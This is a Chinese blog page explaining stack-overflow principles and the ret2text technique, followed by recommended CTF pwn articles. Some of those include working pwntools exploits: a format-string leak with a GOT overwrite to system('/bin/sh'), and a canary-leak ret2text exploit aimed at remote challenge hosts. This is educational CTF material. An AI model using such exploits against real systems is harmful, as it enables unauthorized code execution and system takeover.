栈溢出总结+ret2text

最新推荐文章于 2025-03-31 10:25:31 发布
原创 最新推荐文章于 2025-03-31 10:25:31 发布 · 634 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入探讨了栈溢出的原理,强调了栈中保存的函数返回地址的重要性。通过篡改这个地址,可以实现代码执行的跳转。文章还介绍了函数调用栈的结构和主要过程,并简要提及了保护方式及如何绕过这些保护。

1、堆栈溢出原理

通俗的讲,栈溢出的原理就是不顾堆栈中分配的局部数据块大小,向该数据块写入了过多的数据,导致数据越界,结果覆盖了老的堆栈数据。

其中,最重要的一点: 栈中保存了函数调用时的返回地址。
缓冲区溢出的目的就是要将栈中保存的返回地址篡改成溢出的数据,这样就间接修改了函数的返回地址,当函数返回时,就能跳转到预设的地址中,执行植入的代码。

2、函数调用栈的结构和主要过程
图示:
在这里插入图片描述
文字说明:
调用及释放
汇编代码

push 参数 3               #参数由右向左入栈
push 参数 2
push 参数 1
call 函数地址             #push当前指令位置,跳转到所调用函数的入口地址
push ebp                 #保存旧栈帧的底部
mov ebp,esp              #设置新栈帧底部
sub esp ,xxx             #设置新栈帧顶部

栈帧调整:
保存当前栈帧的状态值,为了后面恢复本栈帧时使用(EBP入栈);
将当前的栈帧切换到新栈帧(ESP值装入EBP,更新栈帧底部);
给新栈帧分配空间(ESP减去所需要空间的大小,抬高栈顶)。

3、保护方式及其绕过方法:

保护 绕过
数据执行保护(NX/DEP) ROP
最低0.47元/天 解锁文章
栈溢出实例--笔记一(ret2text
一只青木呀
08-01 2243
栈溢出实例1、什么是栈溢出?2、栈结构3、栈溢出需要解决的问题3.1、解决如何跳转的问题3.2、跳转到哪里去?4、实战 1、什么是栈溢出栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。 2、栈结构 3、栈溢出需要解决的问题 在我们知道什么是栈溢出以及了解了栈的结构之后,我们就可以开始通过栈溢出破坏栈结构。 在破坏栈结构的时候,我们需要注意两个问题: 1、如何跳转? 2、跳转到哪里去? 3.1、解决如何跳转的问题 在上面栈结构的图中
二进制漏洞挖掘之ret2text栈溢出
夏天又到了的专栏
01-31 973
(2)执行“gcc -m32 -fno-stack-protector ret2text.c -o ret2text”命令,编译程序,再使用gdb调试程序,使程序运行到read函数,执行“cyclic 200”命令,生成200个字符。执行“python ret2text.py”命令,运行脚本,获取系统shell,再执行“ls”命令,测试shell能否正常使用,结果如图11-32所示。由图可知,ebp地址存储的字符为“eaaa”,执行“cyclic -l eaaa”,结果如图11-30所示。
堆栈认知——栈溢出实例(ret2text)_栈溢出以后他就能跳转到你指定的地
2401_83817971的博客
04-06 981
栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致栈中与其相邻的变量的值被改变。你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!” />你的支持,我的动力;祝各位前程似锦,offer不断,步步高升!!!更多资料点击此处获qu!!
ctfshow 01栈溢出ret2text
Cfoxer的博客
02-21 587
file查看文件为64位,同时checksec表明开启了NX保护,所以排除re2shellcode办法,再根据题目提示,锁定目标re2test。根据上下s计算,其大小为0x80(转化十进制128)而在main函数中,我们关注welcome函数。明确目标要替换返回到ctfshow函数。汇编模式下可查看其起始地址为38。查看其变量s大小进行覆盖。
栈溢出学习总结
qq_36386435的博客
06-17 339
栈溢出 前言         距离上一次发博客挺长时间了,没时间,隔一段时间总结一波也可以,CTF中的漏洞挖掘与利用学习,也就是pwn,通常是用ctfwiki来学习的,里面的内容确实可以,但是入门总感觉看起来太枯燥了,当前学习了栈溢出漏洞,整数溢出漏洞,格式化字符串漏洞,条件竞争漏洞,还有堆结构的学习,还未做一些利用堆的题,除了栈溢出漏洞,其他我都是跟着ctfwiki来的,栈溢出漏洞,我觉得ctfwiki上太多了,太枯燥了,就直
网络攻防快速入门笔记pwn | 02 栈溢出题型 | 2.1 ret2textret2shellcode
qq_41040989的博客
03-31 1078
将返回地址覆盖为程序.text段中已有代码的地址,从而执行本身的代码,由于我们要获得shell,二进制文件中本身就含有一个可以直接获取权限的函数,然后我们通过栈溢出漏洞,控制程序执行留,将返回地址覆盖为这个函数的地址让文件运行这个获取权限的函数,我们就可以拿到权限,进而获取flag。程序会把栈的地址输出,然后我们接收程序输出的栈地址,然后向栈中输入shellcode,通过栈溢出跳到输入shellcode的位置,最终获取shell。获取到系统权限之后,就可以输入相应的linux命令,一般用到。
【pwn-栈溢出】— ret2shellcode
weixin_43988488的博客
03-19 522
【代码】【pwn-栈溢出】— ret2shellcode。
栈溢出基础0x01 ret2text
砖家
10-01 859
ret2text
pwn基础之ctfwiki-栈溢出-基本ROP-ret2text
qq_52658640的博客
04-21 1423
文章目录前言原理ret2text发现漏洞利用漏洞书写exp总结 前言 刚开始自己的二进制生涯,想记录一下自己的学习,如有错误还请大佬们斧正。 原理 ret2text 即控制程序执行程序本身已有的的代码 (.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码 (也就是 gadgets),这就是我们所要说的 ROP。 这时,我们需要知道对应返回的代码的位置。当然程序也可能会开启某些保护,我们需要想办法去绕过这些保护。 ret2tex
ret2text失败--记录一次简单的栈溢出
lifanxin的博客
01-20 601
ret2system程序样本程序漏洞Exp总结 程序样本 来自攻防世界的level0样本,检查样本文件,是64位的小端程序,并且只开启了NX保护。 程序漏洞 如上图所示,该程序有非常明显的栈溢出并且存在后门函数,所以下面直接上Exp,并且解释下载ubuntu20.04上遇到的漏洞利用问题。 Exp from pwn import * context(os="linux", arch="amd64", log_level="debug") #p = remote("220.249.52.134",
栈溢出 个人总结
ligangok的专栏
04-15 615
  一个小错误浪费我一上午的查找时间,问题是当我程序退出时会报出“栈错误....0x500000。。。”等一些批东西;后来找错误呗,耐着性子找指针,数组;终于发现问题了;代码如下:char buf[580]; memset(buf,580,sizeof(buf));就是此处出错了具体我就不说了,char最多可以接受255.  思路:一般栈被破坏, 都是栈上变量未初始化, 然后, 函
PWN入门之栈溢出ret2dlresolve
weixin_44681716的博客
05-03 1234
实验目的 当一个程序第一次调用libc中的函数时,必须首先对libc中函数的真实地址进行重定位,而这个绑定寻找真实地址的过程由dl_runtime_resolve完成。 dl_runtime_resolve需要两个参数,一个是link_map=*(GOT[1]),即链接器标志信息和reloc_arg(标志该函数重定位入口偏移),我们需要做的就是控制reloc_arg从而使dl_runtime_re...
关于栈溢出的思考与实验
weixin_43894877的博客
05-27 402
运行如下代码: #include <stdio.h> #include <stdlib.h> typedef struct { int a[2]; double d; } struct_t; double fun(int i) { volatile struct_t s; s.d = 3.14; s.a[i] = 10737418...
Win32漏洞分析与利用 栈缓冲区溢出实验总结
Tracy_yi的博客
05-30 1679
栈溢出 如果程序在处理用户数据时,未能对其大小进行恰当的限制,在进行复制、填充时没对这些数据限定边界,攻击者就可以通过精心设计的数据进行溢出覆盖,修改内存中数据、改变程序的执行流程。 在栈溢出漏洞中,最经典的是借助跳板的栈溢出方式。 左图是一个正常的栈,从高到低依次是:父函数的栈空间、作为返回地址的EIP、保存下来的栈指针EBP、若干局部变量和用于被攻击的缓冲区。 现有的C语言中许多标准函数(如strcpy)在现在看来已经不再是安全的了,利用strcpy讲数据复制到局部数组缓冲区时可以超过缓冲区区域,覆盖
pwn学习笔记(2)ret_2_text_or_shellcode
qq_66013948的博客
02-04 1906
​ ax寄存器:通用寄存器,可用于存放多种数据​ bp寄存器:存放的是栈帧的栈底地址​ sp寄存器:存放的是栈顶的地址​ 栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:​ 在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之后,会按顺序将局部变量压栈,最后是子函数的实际参数,会按照先入栈的后出栈,从最后一个实际参数先入栈再到第一个实际参数,比如函数a(int a ,
CTFshow——Pwn(1)
Y_peak的博客
02-24 537
CTFshow——Pwn(1) 有点懒不想写write up了。只有exploit。 PWN签到题 from pwn import * p = remote('xxx',xxx) p.interactive() pwn02 from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive() pwn03 from pwn import * from
入门到放弃系列 ret2text2
weixin_43489686的博客
09-11 673
ret2text2 这道题依然是入门级别的题目,比上一道题目略难一点,主要区别在于这个题目没有直接给出的后门函数,也就是system函数参数不是/bin/sh,需要自己构造个shell。 首先还是一样先看看这个程序的逻辑,发现这个程序会复述你输入的语句。然后再分别gdb和拖入ida。 main函数点进function里发现逻辑没问题,也有很明显的栈溢出漏洞,其中总偏移量为0x10+8=0x18...
PWN Ret2text
weixin_42306891的博客
03-21 1899
题目:文件夹内; 工具:IDA,gdb,pwntools; 解题思路:关键在偏移量 ; 解题: 1,IDA大法secure函数 调用了system函数,我们要做的是以此拿到shell即可; Main还使用了gets,存在栈溢出风险,以此为突破; 现在分两种解法; 1,gets函数的地址: 下端点,进行一波操作; 信息如下: S相对...
ROP-基础-ret2text
ATFWUS的博客
02-28 966
文件下载地址: 链接:https://pan.baidu.com/s/1_zJ6U5QYokpjSiYLjiM3iA 提取码:gqrc 0x01.checksec Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabl...
fmt+ret2text
最新发布
11-22
### fmt(格式化字符串漏洞)技术介绍及应用 #### 技术介绍 格式化字符串漏洞(fmt)是一种常见的安全漏洞,通常出现在程序使用格式化字符串函数(如`printf`、`sprintf`等)时,没有正确处理用户输入的格式化字符串参数。攻击者可以利用这个漏洞来泄露程序的敏感信息,如内存地址、栈内容等,还可以修改程序的内存数据,从而控制程序的执行流程。 #### 应用示例 在`fmt漏洞 泄露libc → 打got表`的示例中,利用格式化字符串漏洞泄露了`printf`函数的真实地址,进而计算出`libc`库的基地址,然后通过`fmtstr_payload`函数构造新的格式化字符串,将`printf`的`GOT`表项修改为`system`函数的地址,最后传递`/bin/sh`字符串来获取shell。以下是示例代码片段: ```python from pwn import * from LibcSearcher import * url, port = "node4.buuoj.cn", 27466 filename = "./wdb_2018_2nd_easyfmt" elf = ELF(filename) libc = ELF("./libc_x86-2.23.so") context(arch="i386", os="linux") local = 0 if local: context.log_level="debug" io = process(filename) else: io = remote(url, port) def pwn(): printf_got = elf.got['printf'] payload = p32(printf_got) + b'%6$s' io.sendlineafter("repeater?\n", payload) io.recv(4) printf_addr = u32(io.recv(4)) libc_base = printf_addr - libc.sym['printf'] system_addr = libc_base + libc.sym['system'] log.info("system address: %#x" % system_addr) payload = fmtstr_payload(6, {printf_got:system_addr}) io.sendline(payload) io.sendline(b"/bin/sh\x00") if __name__ == "__main__": pwn() io.interactive() ``` ### ret2text技术介绍及应用 #### 技术介绍 ret2text是一种缓冲区溢出攻击技术,其核心思想是利用缓冲区溢出漏洞,覆盖程序的返回地址,使程序跳转到程序自身已有的代码段(通常是包含有用功能的代码,如`system("/bin/sh")`)执行,从而获取系统权限。这种技术不需要额外的库文件,直接利用程序本身的代码逻辑。 #### 应用示例 在`axb_2019_fmt64`示例中,虽然主要是格式化字符串漏洞利用,但也有部分思想与ret2text类似。通过泄露`elf`基地址和`canary`值,然后构造包含正确`canary`和目标函数地址(`backdoor`)的有效负载,让程序跳转到`backdoor`函数执行。以下是示例代码片段: ```python from pwn import * from ctypes import* p = remote('182.92.237.102', 10011) FILENAME = '../pwn' # p = process(FILENAME) # elf = ELF(FILENAME) # libc = ELF('../libc.so.6') # gdb.attach(p, 'b* $rebase(0x133F)') payload = b'flagis\x00' + b'%17$p--%15$p' p.recvuntil(b'>>') p.sendline(payload) p.recvuntil(b'0x') elf_add = int(p.recv(6*2), 16) elfbase = elf_add - 0x1520 success('elfbase '+hex(elfbase)) p.recvuntil(b'0x') canary = int(p.recv(8*2), 16) success('canary '+hex(canary)) backdoor = elfbase + 0x1291 payload = b'exit'.ljust(56, b'\x00') + p64(canary) + p64(0) + p64(backdoor) p.recvuntil(b'>>') p.sendline(payload) p.interactive() ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值